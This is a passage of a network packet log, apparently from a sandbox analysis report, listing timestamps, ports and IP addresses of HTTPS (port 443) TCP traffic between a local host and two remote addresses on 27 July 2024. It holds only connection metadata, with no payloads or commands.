Jul 27, 2024 07:44:06.401653051 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.401719093 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.401760101 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.401771069 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.401789904 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.401806116 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.401823044 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.401952028 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.401992083 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.402008057 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.402015924 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.402033091 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.402050972 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.418517113 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.418575048 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.418601036 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.418612003 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.418636084 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.418648005 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.434176922 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.434222937 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.434267044 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.434274912 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.434305906 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.435813904 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.456003904 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.456053019 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.456082106 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.456104040 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.456118107 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.456285954 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.456341028 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.456382990 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.456398010 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.456410885 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.456435919 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.456442118 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.456604004 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.456645012 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.456657887 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.456665039 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.456696987 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.456701994 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.514498949 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.514544010 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.514569044 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.514585018 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.514595985 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.514621973 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.514755964 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.514796972 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.514811039 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.514820099 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.514847040 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.514858961 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.515060902 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.515101910 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.515115976 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.515124083 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.515147924 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.515165091 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.520982981 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.521024942 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.521054029 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.521066904 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.521075964 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.521102905 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.522924900 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.522968054 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.522994995 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.523000956 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.523026943 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.523041964 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.558527946 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.558568954 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.558588028 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.558604002 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.558625937 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.558646917 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.558773041 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.558813095 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.558903933 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.558909893 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.558964968 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.559036016 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.559077978 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.559089899 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.559108973 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.559143066 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.559163094 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.601917028 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.601963997 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.602014065 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.602025986 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.602056026 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.602071047 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.602550030 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.602588892 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.602605104 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.602612972 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.602634907 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.602653027 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.602986097 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.603037119 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.603054047 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.603061914 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.603072882 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.603096962 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.608623028 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.608668089 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.608685017 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.608694077 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.608714104 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.608731985 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.610661983 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.610707045 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.610721111 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.610729933 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.610754967 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.610768080 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.646186113 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.646228075 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.646342039 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.646342039 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.646364927 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.646404028 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.646413088 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.646439075 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.646466970 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.646482944 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.646490097 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.646513939 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.646543026 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.646564007 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.646756887 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.646800041 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.646817923 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.646826029 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.646857023 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.646862984 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.689966917 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.690026999 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.690046072 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.690067053 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.690078020 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.690103054 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.690197945 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.690239906 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.690258026 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.690264940 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.690291882 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.690365076 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.690403938 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.690417051 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.690418005 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.690450907 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.690469980 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.690495014 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.696270943 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.696319103 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.696458101 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.696458101 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.696489096 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.696527958 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.698468924 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.698508024 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.698532104 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.698553085 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.698565960 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.698708057 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.727426052 CEST	62253	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:44:06.727514029 CEST	443	62253	167.235.128.153	192.168.2.4
Jul 27, 2024 07:44:06.727602005 CEST	62253	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:44:06.727906942 CEST	62253	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:44:06.727945089 CEST	443	62253	167.235.128.153	192.168.2.4
Jul 27, 2024 07:44:06.733741045 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.733788013 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.733808994 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.733823061 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.733849049 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.733865976 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.734090090 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.734134912 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.734157085 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.734163046 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.734186888 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.734198093 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.734297037 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.734342098 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.734352112 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.734368086 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.734395027 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.734409094 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.777631998 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.777673960 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.777925968 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.777987957 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.777987003 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.778004885 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.778014898 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.778033018 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.778191090 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.778228998 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.778250933 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.778310061 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.778351068 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.784204960 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.784251928 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.784286022 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.784306049 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.784320116 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.786830902 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.786870003 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.786896944 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.786906004 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.786945105 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.822168112 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.822237968 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.822384119 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.822422028 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.822520971 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.822571039 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.822571039 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.822571993 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.822606087 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.822839975 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.822839975 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.822839975 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.865432024 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.865478039 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.865487099 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.865520954 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.865704060 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.865704060 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.865704060 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.865998983 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.866045952 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.866080046 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.866091013 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.866110086 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.866133928 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.866360903 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.866401911 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.866425037 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.866431952 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.866453886 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.866472960 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.872432947 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.872474909 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.872536898 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.872536898 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.872556925 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.872596979 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.873996973 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.874043941 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.874063969 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.874072075 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.874098063 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.874104977 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.909559965 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.909607887 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.909780025 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.909801960 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.909827948 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.909847021 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.909854889 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.909890890 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.910012007 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.910053015 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.910075903 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.910089016 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.910113096 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.953249931 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.953329086 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.953502893 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.953541040 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.953605890 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.953605890 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.953605890 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.953605890 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.953629971 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.953672886 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.953710079 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.953756094 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.953773022 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.953780890 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.953809977 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.953820944 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.959561110 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.959604025 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.959717035 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.959717035 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.959738016 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.959952116 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.961749077 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.961797953 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.961826086 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.961838007 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:06.961852074 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:06.961879015 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.231391907 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.231451988 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.231472969 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.231489897 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.231525898 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.231544018 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.231626034 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.231686115 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.231694937 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.231714964 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.231745958 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.231765032 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.231915951 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.231961966 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.231982946 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.231987953 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.232011080 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.232019901 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.232134104 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.232175112 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.232196093 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.232201099 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.232228041 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.232234001 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.232350111 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.232393026 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.232409000 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.232414961 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.232445955 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.232460022 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:07.232630968 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.232677937 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:07.232700109 CEST	62252	443	192.168.2.4	185.149.100.242
